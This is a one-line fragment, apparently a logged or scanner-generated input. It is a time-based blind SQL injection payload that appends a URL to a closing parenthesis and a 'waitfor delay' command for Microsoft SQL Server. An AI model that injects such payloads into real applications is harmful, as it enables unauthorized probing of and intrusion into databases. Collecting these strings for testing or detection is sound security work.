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http://www.example.com-1); waitfor delay '0:0:15' -- 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